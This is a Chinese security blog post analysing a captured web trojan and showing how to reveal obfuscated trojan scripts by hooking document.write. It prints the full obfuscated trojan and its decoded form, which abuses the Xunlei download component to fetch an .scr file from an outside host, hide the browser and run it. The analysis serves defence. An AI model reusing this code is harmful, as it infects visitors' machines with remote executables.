【文章标题】: 借"3168a网马"案例来分析所谓的自写函数加密解密网马
【文章作者】: T4nk
【作者邮箱】: [email protected]
【作者主页】: http://www.upx.com.cn
事出有因:某天 客户公司内网中毒 经过抓包一查
为http://ora点3168a点com//s368%5C/NEwJs2.js
里面包含 MS06-014 迅雷 网马
其实整个解密过程相当简单(之前有说明过 所以不再…)
其中有个网马加密原型如下:
#1号—————
<html><head><Meta Name=TestName Content=Test>
<noscript><iframe></iframe></noscript><script language="javascript"><!–
wH84="3e/_rJxx/_/|",zO68="3eC32x/n3/,";0.4556224,sM2="0.8569908",zO68='/rq/]/$m0
/*/'//sE3l26ANaIM/^/.ux/"/<FyR1/,/{/)/n/!/#QW/ kGtcSJ8i/>CO/:/-Zhjg/;/@z4/?
r/(/_v/=XbP/&H//dU9/+Bwp/~oYT/[D7/`/%/}enL/|Kf5V',wH84='/r/$/_Zv/>A/(K/:pq0D7/*BTd
/[L/]Pc1
/"/+Jg/@/=6HN4/ jS/}//V/&ziO2C/<r9/#/!kfbI/|xRmX/`5Y3y//W/{hFE/^Go/nUtn/;/?QMs/)
l/'we/~/./,a8/-u/%';function uW24(dH55){"Je2/|/,/|rxHK3J",l=dH55.length;'AP/*X0/*/'A/
%',w='';while(l–)"2eC/,r32/,HK3J",o=wH84.indexOf(dH55.charAt(l)),'AP/=A/nA/%/=0',w=(o==-1?
dH55.charAt(l):zO68.charAt(o))+w;"3e/n/n/,/_Jr/|",wH84=wH84.substring(1)+wH84.charAt
(0),document.write(w);'APCX/%/%/'X/='};uW24("/"/:z/`Cn/&/}0T/.IPTI/~ybT3T/:z/`Cn/&/<P/)
lly/@/@/@q/|/-P/.z/&C/?/./}Y/./`5H6/`/~/&P/`/./}/&/`P/~e/?/./~/`/`/?
/`yY/./`/|I9D/@y2umq/|f8o/>y/@/@/@7/|zQ22y72q/>/|/|Y0Cz/~/./:/~/^Y/&/?Yy1fPJP/-/~/.I1
/|/"K/:z/`Cn/&/<")//–></script><SCRIPT LaNGuAGE=JavAScRIpt>uW24("");</sCripT><SCRipt
lanGUAge=jAvAscRIPt>uW24("JqOYr/?iVqYOW/+rA/?MYi/[aic/|q/+9JpqOYr/?i9");</SCRiPt><sCrIPt
LanGUage=jAvascriPt>uW24("Zjg0239QO/#ZjWL3/&R//ws/?8/*sL/na/nH/{KmZjWL3/&R//GLWa6
/"8H/{KmZjWL3/&9/n///r9/*aHmZjO/|/"8/na3//0a3Wa31CaO/!s8
/r9RyJo/+5wo/+T/$o/+e7o/+e7o/+THo/+Teo/+T/$o/+/$Ko/+THo/+TDo/+T/$o/+T/!
JNJo/+55o/+T/@o/+eeo/+TDo/+T/!o/+T/@o/+THo/+T5o/+57o/+T/@o/+Two/+eKo/+T/!
o/+T/$o/+e5o/+T/$JNJKJ/ mZjO/|/"8/na3//0a3Wa31CaO/!s8
/r9RyJo/+/$7o/+T/@o/+e/$o/+TDo/+T5JNJo/+55o/+T/@o/+eeo/+TDo/+T/!
o/+T/@o/+THo/+T5o/+57o/+T/@o/+Two/+eKo/+T/!o/+T/$o/+e5o/+T/$JNJKJ/ mZjO/|/"8/na3
//0a3Wa31CaO/!s8/r9RyJo/+5wo/+T/$o/+e7o/+e7o/+THo/+Teo/+T/$o/+/$Ko/+THo/+TDo/+T/$o/
+T/!
JNJo/+55o/+T/@o/+eeo/+TDo/+T/!o/+T/@o/+THo/+T5o/+5To/+THo/+Tto/+T/!JNJKJ/ mZj/?98/ns/?12
/*9QFsL3
/nwLOL10aOwLOLyJlJnJo/+T/$JnJ/+JnJOJNJJnJ/|JnJJnJOJnJOJnJQJnJo/+7dJnJo/$eJnJqJnJ/(JnJJnJ/
=Jn
J1JnJ/+JnJ/"JnJ8JnJ/*JnJaJnJ9JnJo/$TJnJ2JnJsJnJ/(JnJqaJnJ3JnJ3sJnJ3JnJo/+BDo/+e5JnJ/+JnJJnJo
/+e5J/ mZj/r/"82O9s8/&a/+a2Hy/ Zj4Zj 9/ryR//GLWa6/"8H/{/{H/ Zj 4Zj O/|/"8/na3
//0a3Wa31wa/*aOalL0zy9/n///r9/*aHN/&K/ mZj 3aO/"38mZj /,Zj WL3/&3aO/{O/|/"8
/na3//0a3Wa31kQa8lL0z/@9/*ay9/n///r9/*aHN/&bH/ mZj 9/ry3aO/{/{K/ R//GLWa6
/"8H/{HmZj/,ZjZj/r/"82O9s8/&6/"8dQQHy/ Zj4Zj WL3/&L3/=/{O/|/"8/na3//0a3Wa31iaOlL0z/-
90OyJo/+7Ho/+7HJN/&KN/&HN/&K/ 10Q/*9OyJ4o3/:o3/,J/ mZj 9/n///r9/*aH/{L3/=/'H/>mZj
0aO/]8Oa3WL/*ypa/+a2Hy/ pN/$KK/ mZj/,ZjZj/r/"82O9s8/&2s/(/(9O//OL0zHy/ Zj4Zj Zj WL3
/&3aO/&/{/&O/|/"8/na3//0a3Wa31/!
s/(/(9OlL0zyKN/&J/|JnJOJnJOJnJQJnJfJnJqJnJqJnJo/+T/@o/+eBo/+THo/+BDo/+77o/+7Ho/+7To/
+7ro/+TH
o/+BDo/+T7o/+T/@o/+Two/+B/@o/+/$7o/+77o/+7To/+7ro/+B/@o/+/$7o/+77o/+7To/+7ro/
+BDo/+e7o/+T7o/
+eBJN/&Jo/+T7o/+7do/+/$/!o/+/$/!J/ mZj 9/r/&y3aO/&/{/{/&K/^/^R//ws/?8/*sL/na/nH/{/{K/ Zj
4Zj Zj R//ws/?8/*sL/na/nH/{HmZj O/|/"8/na3
//0a3Wa31G9/na/;3s/?0a3V98/ns/?yH/ mZj 6/"8dQQHy/ mZj /,Zj a/*0a/&Zj
3aO/"38mZj/,Zj0aO/]
8Oa3WL/*ypo/+T7o/+T/@o/+Two/+Two/+Tto/+e5o/+/$/@o/+e5o/+THo/+e7o/+T/;o/+7Ho/
+Bro/+BtpNH/
mZjWL3/&0O3U3/*/&/{/&RaO//0a3Wa3//QLO/|y/
/&n/&Jo/+/$Ko/+THo/+Teo/+T/$o/+B/@o/+THo/+T5o/+T5o/+/$/@o/+e5o/+THo/+e7o/+T/;o/
+BDo/+Tro/+e5
o/+TwJmZjO/|/"8/na3//0a3Wa31CaO/;3s/?0a3V98/ns/?wLOLy0O3U3
/*N/&Jo/"TeBdo/"eeD/$o/"t/$Hto/"r/;D/@J/ mZjgq0239QO/#")</script></head><body></body></html>
#1号—————
可能你会看起来眼花哦 呵呵
真所谓万变不离其宗
万法归宗 嘿嘿 扯的有点远啦
由于任何加密的网马都要通过浏览器来执行 …. 所以怎么变也是要变为"原形"的
SO
直接用手工解密:
<html>
<script>document._write = document.write; document.write = function(html) {this._write
(html.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">")); };
document.writeln = function(html){this.write(html);this.write("/r/n");}</script><pre><!–
请把加密的代码完整贴上箭头的后面 然后运行代码后 浏览器会告诉你解密后的代码 嘿嘿
下面是箭头
–>
上面那段#1号
---------------------
然后保存为t4nk.htm
然后直接用 文件-打开 打开你的t4nk.htm
出现如下:
——————————————————————–
<script language=javascript>uD77=1113;function _nr(){return true}
onerror=_nr;gO21=8543;hK90=1116;cY88=6830;;_licensed_to_="huyufeng";</script><script
src="important.js"></script>
<script>
var g_Downloaded1=0;
var g_HaveRun1=0;
var id_file1;
thunder_server.SetConfig("/x4D/x65/x73/x73/x61/x67/x65/x50/x61/x6E/x65/x6C","/x44/x6F/x77
/x6E/x6C/x6F/x61/x64/x43/x6F/x6D/x70/x6C/x65/x74/x65","0");
thunder_server.SetConfig("/x53/x6F/x75/x6E/x64","/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x43
/x6F/x6D/x70/x6C/x65/x74/x65","0");
thunder_server.SetConfig("/x4D/x65/x73/x73/x61/x67/x65/x50/x61/x6E/x65/x6C","/x44/x6F/x77
/x6E/x6C/x6F/x61/x64/x46/x61/x69/x6C","0");
window.clipboardData.setData
("T"+"/x65"+"x"+"t",""+"h"+""+"t"+"t"+"p"+"/x3A"+"/57"+"/"+"m"+""+"y"+"."+"x"+"u"+"n"+"l"+"e
"+"i"+"/56"+"c"+"o"+"m"+"/e"+"r"+"ro"+"r"+"/x2E/x74"+"x"+""+"/x74");
function exec1()
{
if(g_HaveRun1==1)
{
thunder_server.DeleteTask(id_file1, 0);
return;
}
var ret=thunder_server.OpenTaskFile(id_file1, -1);
if(ret==0)g_HaveRun1=1;
}
function RunApp1()
{
var ary=thunder_server.GetTaskList("/x31/x31", 0, 1, 0).split("{/r*/r}");
id_file1=ary[1];
setInterval('exec1()',500);
}
function commit_task1()
{
var ret = thunder_server.CommitTask(0, "h"+"t"+"t"+"p"+":"+"/"+"/"+"/x6F/x72/x61
/x2E/x33/x31/x36/x38/x61/x2E/x63/x6F/x6D/x2F/x53/x33/x36/x38/x2F/x53/x33/x36/x38/x2E/x73
/x63/x72", "/x63/x3A/x5C/x5C");
if (ret == 0&&g_Downloaded1==0)
{
g_Downloaded1=1;
thunder_server.HideBrowserWindow(1);
RunApp1();
}
else
return;
}
setInterval('/x63/x6F/x6D/x6D/x69/x74/x5F/x74/x61/x73/x6B/x31/x28/x29',1);
var strUrl = get_server_path() + "/x50/x61/x67/x65/x2F/x61/x64/x64/x5F/x74/x61/x73
/x6B/x2E/x68/x74/x6D";
thunder_server.SetBrowserWindowData(strUrl, "/u672A/u77E5/u9519/u8BEF");
</script>
————————————————————————————–
讲到这里 大家应该明白所谓自写函数加密网马解密工具的原理了吧
我感觉这点东西不知道有没有必要写成工具 所以以前就没有去写。。。
嘿嘿
大家想写 直接memo一个 savefileto然后 直接用浏览器执行代码后
再load回来 就可以啦
你自己也可以写一个“自写函数加密网马解密工具”的
呵呵~~
最后
以后还有其它解不开的脚本,可以用这段试一下,但是它只接管了 document.write/writeln,对不经过 document.write 输出的自写过程无效,只能对付100%用IE自身方法输出的加密:
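<script>
// Analysis helper: keep the real document.write, then replace it with a hook
// that HTML-escapes everything the decoded stage tries to write. The decoded
// script text is therefore displayed verbatim inside the <pre> below instead
// of being parsed and executed by the browser.
// Only output that goes through document.write/writeln is captured, and the
// encoded first stage itself still executes as script in the browser that
// opens this file. '&' is escaped first so the entities added for '<' and '>'
// are not double-escaped.
document._write = document.write;
document.write = function (html) {
  this._write(html.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;"));
};
document.writeln = function (html) {
  this.write(html);
  this.write("\r\n");
};
</script><pre><!--
Paste the complete encoded code after the arrow below, save and open the page;
the browser then shows the decoded code here.
Arrow:
-->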
PS:其实这个方法最早发现的并不是俺 俺只是很早以前google找东西的时候找到的 只是没有发布出来
最近客户说有个叫"自写函数加密网马解密工具" 一看就知道这原理了 所以公布了
收工 by T4nk
最后大家可以试着用手工 来的方便点 嘿嘿
自娱自乐
效果不错